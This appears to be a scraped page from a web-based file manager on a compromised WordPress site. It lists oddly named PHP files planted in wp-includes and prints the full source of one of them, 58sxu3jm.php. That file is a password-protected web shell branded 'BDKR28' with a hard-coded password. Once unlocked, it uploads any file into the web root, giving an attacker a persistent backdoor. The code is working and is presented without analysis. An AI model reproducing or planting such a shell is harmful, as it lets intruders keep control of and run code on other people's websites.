at path:
ROOT
/
wp-includes
/
58sxu3jm.php
run:
R
W
Run
ID3
DIR
2026-01-30 07:42:00
R
W
Run
IXR
DIR
2026-01-30 07:42:00
R
W
Run
PHPMailer
DIR
2026-01-30 07:42:00
R
W
Run
Requests
DIR
2025-08-01 16:25:23
R
W
Run
SimplePie
DIR
2026-01-30 07:42:00
R
W
Run
Text
DIR
2026-01-30 07:42:01
R
W
Run
abilities-api
DIR
2026-01-30 07:42:00
R
W
Run
assets
DIR
2026-01-30 07:42:00
R
W
Run
block-bindings
DIR
2026-01-30 07:42:00
R
W
Run
block-patterns
DIR
2026-01-30 07:42:00
R
W
Run
block-supports
DIR
2026-04-11 08:13:52
R
W
Run
blocks
DIR
2026-01-30 07:42:00
R
W
Run
certificates
DIR
2026-01-30 07:42:01
R
W
Run
css
DIR
2026-01-30 07:42:00
R
W
Run
customize
DIR
2026-01-30 07:42:00
R
W
Run
fonts
DIR
2026-01-30 07:42:00
R
W
Run
html-api
DIR
2026-01-30 07:42:00
R
W
Run
images
DIR
2026-01-30 07:42:00
R
W
Run
interactivity-api
DIR
2026-01-30 07:42:00
R
W
Run
js
DIR
2026-01-30 07:42:01
R
W
Run
l10n
DIR
2026-01-30 07:42:01
R
W
Run
php-compat
DIR
2026-01-30 07:42:00
R
W
Run
pomo
DIR
2026-01-30 07:42:00
R
W
Run
rest-api
DIR
2026-01-30 07:42:00
R
W
Run
sitemaps
DIR
2026-01-30 07:42:00
R
W
Run
sodium_compat
DIR
2026-01-30 07:42:00
R
W
Run
style-engine
DIR
2026-01-30 07:42:00
R
W
Run
theme-compat
DIR
2026-01-30 07:42:00
R
W
Run
widgets
DIR
2026-01-30 07:42:00
R
W
Run
2.php
3.83 KB
2026-04-11 14:14:22
R
W
Run
Delete
Rename
58sxu3jm.php
1.16 KB
2026-04-10 23:48:36
R
W
Run
Delete
Rename
BDKR.txt
52 By
2026-04-11 06:13:24
R
W
Run
Delete
Rename
orkbhlxy.php
760 By
2026-04-10 18:50:08
R
W
Run
Delete
Rename
style.php
946 By
2026-04-11 07:13:41
R
W
Run
Delete
Rename
temljm4j.php
1.16 KB
2026-04-11 06:13:24
R
W
Run
Delete
Rename
wp-themes.php
53.22 KB
2026-04-11 13:22:27
R
W
Run
Delete
Rename
error_log
up
📄
58sxu3jm.php
Save
<?php // Title: BDKR28 is here ?> <!DOCTYPE html> <html> <head> <title>BDKR28 is here</title> </head> <body> <?php $password = isset($_GET['BDKR28']) ? $_GET['BDKR28'] : ''; $correct_password = 'n49u'; // This will be replaced with a random password if ($password !== $correct_password) { echo '<center><h2>BDKR28 is here</h2><b>Invalid Password!</b><br><br>'; echo '<form action="" method="get">'; echo '<input type="password" name="BDKR28" placeholder="Enter Password">'; echo '<input type="submit" value="Submit">'; echo '</form></center>'; exit; } echo '<center><h2>BDKR28 is here</h2>'; echo '<form action="" method="post" enctype="multipart/form-data">'; echo '<input type="file" name="file"><br><br>'; echo '<input type="submit" name="upload" value="Upload File">'; echo '</form>'; if (isset($_POST['upload'])) { $file = $_FILES['file']['name']; $tmp = $_FILES['file']['tmp_name']; if (move_uploaded_file($tmp, $file)) { echo '<b>File Uploaded Successfully!</b><br>'; echo 'File: <a href="' . $file . '">' . $file . '</a>'; } else { echo '<b>File Upload Failed!</b>'; } } echo '</center>'; ?> </body> </html>